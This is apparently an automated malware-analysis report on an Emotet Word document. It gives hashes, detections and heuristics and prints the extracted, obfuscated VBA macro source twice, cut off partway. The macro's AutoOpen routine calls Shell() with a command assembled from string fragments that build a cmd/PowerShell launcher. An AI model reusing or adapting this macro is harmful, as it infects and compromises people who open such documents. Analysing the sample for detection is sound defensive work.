Emotet Office (OLE) malware analysis — malicious · c932d54a9ef3c645

MALICIOUS

Office (OLE)

120.5 KB Created: 2018-06-04 19:41:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 124d03b86227bbf282f0f567ae11858e SHA-1: 9f6325ebce797b5ceec1bbf32e61aec8fbe8b650 SHA-256: c932d54a9ef3c645a28b7d8de9747fc6c06fc23c6d65c036da4eae4d778a81db

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-7339642-0'. Static analysis revealed a VBA macro with an AutoOpen function that utilizes the Shell() function. This function is used to execute a command, likely to download and run a secondary payload, which is characteristic of Emotet's behavior.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7339642-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7339642-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18104 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18104 bytes
SHA-256: `c95a657598105e0a38b59ce3511d99c688fe1e0dc40faefaf0b8447dd7fa30d9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ipJnaIXAYRam" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function ktvWqGIZcib() On Error Resume Next For aYoEIp = KWJmm To 73675 CjnciK = (XDMOYN - ChrW(32283 * 4926) * kEmjLH * CInt(RCHlf + Sqr(13389)) + 21675 - 35437 / 48291 - CDate(AjNFka - 55179 + 27390 - Hex(Ubpkb / 91831)) + (bZiAD * Tan(vSVaXY))) Next For Qsupw = kooAi To 19219 ImpcR = (qYfljY - ChrW(48156 * 27607) * vkJCEM * CInt(chzoOL + Sqr(36201)) + 74234 - 48293 / 7838 - CDate(idJctI - 83995 + 65433 - Hex(kGKQXw / 98466)) + (EqbFIV * Tan(HcdQi))) Next ktvWqGIZcib = GEuCvJPUG + Shell(rcnYYs + Chr(sUYww + vbKeyC + fHSacpXD) + YwInIaCpkSV + jCBOJimKH + hwUCtSTSdOY + cvjTfa + ziTjFFKE + JtiThN + jjoFmuCf, IzaIZz + 0 + Mornb) For sMfiq = bSqALW To 67593 WXiRP = (Zhick - ChrW(49589 * 14363) * VRfaDY * CInt(tihjNX + Sqr(52585)) + 27057 - 80624 / 30994 - CDate(ZTnktM - 2463 + 34903 - Hex(KiDwRd / 54185)) + (ZVkSKK * Tan(tAlBoz))) Next End Function Sub Autoopen() On Error Resume Next For sMBAn = lXSZl To 85260 ObjOkv = (oUfQOI - ChrW(20586 * 82665) * bzdirl * CInt(wQpQLB + Sqr(4968)) + 21067 - 64786 / 35529 - CDate(OSRWRt - 37523 + 59801 - Hex(jlmiB / 88729)) + (rZHKpd * Tan(nwufSn))) Next ktvWqGIZcib For Uiviw = bFikO To 23014 JLiKP = (VLkZI - ChrW(77933 * 70946) * iXWOBr * CInt(MCqAE + Sqr(40777)) + 8424 - 73298 / 84147 - CDate(vdPab - 38746 + 69085 - Hex(ARGjI / 76123)) + (LrwhLV * Tan(UHzIn))) Next End Sub Attribute VB_Name = "LwRZtBMK" Function YwInIaCpkSV() On Error Resume Next For Mddmm = qGQlT To 94448 JORjX = (qNpJBV - ChrW(95975 * 6527) * jMYRwM * CInt(AQMDJz + Sqr(11876)) + 55055 - 27066 / 2497 - CDate(WTvVK - 26557 + 30288 - Hex(zWUbQ / 78073)) + (HXDMC * Tan(BTOAW))) Next NdYqCWAjR = "md BcGtnW" + "EioCVEM lKkOETA" + "LpfZG" + "ZfiwTsEkvmr" + "HnUz LZBKFRW" + "ZwF & %^c^o" + "^m^S^p^E^c" + "^% %^c^o" + "^m^S^p^E^c^" + "% /V " For mrHNv = RbjoO To 5405 BbMTf = (vPwsjZ - ChrW(3408 * 97406) * VAhVn * CInt(ddsJZb + Sqr(98927)) + 25771 - 56476 / 36134 - CDate(ABBZp - 98982 + 67054 - Hex(aEqzY / 77125)) + (BNGjHt * Tan(QYzUK))) Next nOqnGif = " /c " + " set %uo" + "pnaU" + "hzED" + "FEBLH%=qYsGRwC" + "o&&set %PZflvBR" + "%=p" + "&&set" + " %aw" For NwBSZ = YAzifA To 96426 MqniT = (fZmHu - ChrW(22278 * 28475) * kdbUoc * CInt(iCXZwP + Sqr(86320)) + 8665 - 66243 / 50471 - CDate(JjDalS - 2040 + 79288 - Hex(oKuYNL / 75717)) + (UDLLV * Tan(hoPEV))) Next IfItQDKiwMY = "ozRZMKwpdapL%" + "=o^w&&se" + "t %" + "dG" + "XwUhIJzOwP" + "vIL" + "%=aqPuRGX" + "qCw&&set %uRcb" For mUDhL = fiKrI To 38037 BIUHwM = (cdkfPW - ChrW(75318 * 43551) * lVOfj * CInt(TGNNLj + Sqr(10073)) + 10040 - 54601 / 90128 - CDate(MUENjQ - 85749 + 66787 - Hex(JkYRpP / 16416)) + (YWunQ * Tan(oNulB))) Next LticYSqvY = "MkiXY" + "FU%=!%PZflv" + "BR%!&&se" + "t %bwjrovmAJUz" + "kdWu%=FnMsLi" For WXHkX = SSHFE To 41374 FijhvX = (YsjFAD - ChrW(92189 * 14470) * zmfrc * CInt(lcoti + Sqr(93858)) + 81525 - 10078 / 38103 - CDate(YqKiF - 61261 + 97118 - Hex(FhirB / 68742)) + (OLCHS * Tan(dUzsG))) Next tiOKNkbQ = "NV" + "jbi" + "IXX&&set %" + "VX" + "sVrCz%=e^r&&set" For BszhnM = bMlYKT To 76864 mubub = (ZQloz - ChrW(2279 * 85567) * WKqzmw * CInt(GArfN + Sqr(15877)) + 15312 - 55065 / 73407 - CDate(niHrZX - 96197 + 59798 - Hex(ccNtpL / 91451)) + (qaiKhr * Tan(jukPNw))) Next JGwVnvXsY = " %fjY" + "RtGu" + "jOz%=!%awozR" + "ZMK" + "wpdapL%!&&se" + "t %XUpM" For ozvJW = DwnsUz To 38874 sGBTSb = (BDhGn - ChrW(22442 * 22052) * niRsLo * CInt(zjoLd + Sqr(87015)) + 75916 - 81727 / 81898 - CDate(XDnniv - 90574 + 39928 - Hex(mwOCjY / 84417)) + (AJCFJ * Tan(fJViH))) Next NvDFpFNG = "bfY%=s&&set %i" + "juWGJcI" + "ZDduwqZ%=NtzVBk" + "dKmtkLL" + "&&set %XFPfUwGw" + "P%=he&&se" + "t %WjC" + "MOLDYKNDfas%=" + "ll&&!%u ... (truncated)

SHA-256: c95a657598105e0a38b59ce3511d99c688fe1e0dc40faefaf0b8447dd7fa30d9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ipJnaIXAYRam"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ktvWqGIZcib()
On Error Resume Next
For aYoEIp = KWJmm To 73675
         CjnciK = (XDMOYN - ChrW(32283 * 4926) * kEmjLH * CInt(RCHlf + Sqr(13389)) + 21675 - 35437 / 48291 - CDate(AjNFka - 55179 + 27390 - Hex(Ubpkb / 91831)) + (bZiAD * Tan(vSVaXY)))
Next
For Qsupw = kooAi To 19219
         ImpcR = (qYfljY - ChrW(48156 * 27607) * vkJCEM * CInt(chzoOL + Sqr(36201)) + 74234 - 48293 / 7838 - CDate(idJctI - 83995 + 65433 - Hex(kGKQXw / 98466)) + (EqbFIV * Tan(HcdQi)))
Next
ktvWqGIZcib = GEuCvJPUG + Shell(rcnYYs + Chr(sUYww + vbKeyC + fHSacpXD) + YwInIaCpkSV + jCBOJimKH + hwUCtSTSdOY + cvjTfa + ziTjFFKE + JtiThN + jjoFmuCf, IzaIZz + 0 + Mornb)
For sMfiq = bSqALW To 67593
         WXiRP = (Zhick - ChrW(49589 * 14363) * VRfaDY * CInt(tihjNX + Sqr(52585)) + 27057 - 80624 / 30994 - CDate(ZTnktM - 2463 + 34903 - Hex(KiDwRd / 54185)) + (ZVkSKK * Tan(tAlBoz)))
Next
End Function
Sub Autoopen()
On Error Resume Next
For sMBAn = lXSZl To 85260
         ObjOkv = (oUfQOI - ChrW(20586 * 82665) * bzdirl * CInt(wQpQLB + Sqr(4968)) + 21067 - 64786 / 35529 - CDate(OSRWRt - 37523 + 59801 - Hex(jlmiB / 88729)) + (rZHKpd * Tan(nwufSn)))
Next
ktvWqGIZcib
For Uiviw = bFikO To 23014
         JLiKP = (VLkZI - ChrW(77933 * 70946) * iXWOBr * CInt(MCqAE + Sqr(40777)) + 8424 - 73298 / 84147 - CDate(vdPab - 38746 + 69085 - Hex(ARGjI / 76123)) + (LrwhLV * Tan(UHzIn)))
Next
End Sub


Attribute VB_Name = "LwRZtBMK"
Function YwInIaCpkSV()
On Error Resume Next
For Mddmm = qGQlT To 94448
         JORjX = (qNpJBV - ChrW(95975 * 6527) * jMYRwM * CInt(AQMDJz + Sqr(11876)) + 55055 - 27066 / 2497 - CDate(WTvVK - 26557 + 30288 - Hex(zWUbQ / 78073)) + (HXDMC * Tan(BTOAW)))
Next
NdYqCWAjR = "md BcGtnW" + "EioCVEM lKkOETA" + "LpfZG" + "ZfiwTsEkvmr" + "HnUz LZBKFRW" + "ZwF &     %^c^o" + "^m^S^p^E^c" + "^%     %^c^o" + "^m^S^p^E^c^" + "%     /V      "
For mrHNv = RbjoO To 5405
         BbMTf = (vPwsjZ - ChrW(3408 * 97406) * VAhVn * CInt(ddsJZb + Sqr(98927)) + 25771 - 56476 / 36134 - CDate(ABBZp - 98982 + 67054 - Hex(aEqzY / 77125)) + (BNGjHt * Tan(QYzUK)))
Next
nOqnGif = "   /c    " + "       set %uo" + "pnaU" + "hzED" + "FEBLH%=qYsGRwC" + "o&&set %PZflvBR" + "%=p" + "&&set" + " %aw"
For NwBSZ = YAzifA To 96426
         MqniT = (fZmHu - ChrW(22278 * 28475) * kdbUoc * CInt(iCXZwP + Sqr(86320)) + 8665 - 66243 / 50471 - CDate(JjDalS - 2040 + 79288 - Hex(oKuYNL / 75717)) + (UDLLV * Tan(hoPEV)))
Next
IfItQDKiwMY = "ozRZMKwpdapL%" + "=o^w&&se" + "t %" + "dG" + "XwUhIJzOwP" + "vIL" + "%=aqPuRGX" + "qCw&&set %uRcb"
For mUDhL = fiKrI To 38037
         BIUHwM = (cdkfPW - ChrW(75318 * 43551) * lVOfj * CInt(TGNNLj + Sqr(10073)) + 10040 - 54601 / 90128 - CDate(MUENjQ - 85749 + 66787 - Hex(JkYRpP / 16416)) + (YWunQ * Tan(oNulB)))
Next
LticYSqvY = "MkiXY" + "FU%=!%PZflv" + "BR%!&&se" + "t %bwjrovmAJUz" + "kdWu%=FnMsLi"
For WXHkX = SSHFE To 41374
         FijhvX = (YsjFAD - ChrW(92189 * 14470) * zmfrc * CInt(lcoti + Sqr(93858)) + 81525 - 10078 / 38103 - CDate(YqKiF - 61261 + 97118 - Hex(FhirB / 68742)) + (OLCHS * Tan(dUzsG)))
Next
tiOKNkbQ = "NV" + "jbi" + "IXX&&set %" + "VX" + "sVrCz%=e^r&&set"
For BszhnM = bMlYKT To 76864
         mubub = (ZQloz - ChrW(2279 * 85567) * WKqzmw * CInt(GArfN + Sqr(15877)) + 15312 - 55065 / 73407 - CDate(niHrZX - 96197 + 59798 - Hex(ccNtpL / 91451)) + (qaiKhr * Tan(jukPNw)))
Next
JGwVnvXsY = " %fjY" + "RtGu" + "jOz%=!%awozR" + "ZMK" + "wpdapL%!&&se" + "t %XUpM"
For ozvJW = DwnsUz To 38874
         sGBTSb = (BDhGn - ChrW(22442 * 22052) * niRsLo * CInt(zjoLd + Sqr(87015)) + 75916 - 81727 / 81898 - CDate(XDnniv - 90574 + 39928 - Hex(mwOCjY / 84417)) + (AJCFJ * Tan(fJViH)))
Next
NvDFpFNG = "bfY%=s&&set %i" + "juWGJcI" + "ZDduwqZ%=NtzVBk" + "dKmtkLL" + "&&set %XFPfUwGw" + "P%=he&&se" + "t %WjC" + "MOLDYKNDfas%=" + "ll&&!%u
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.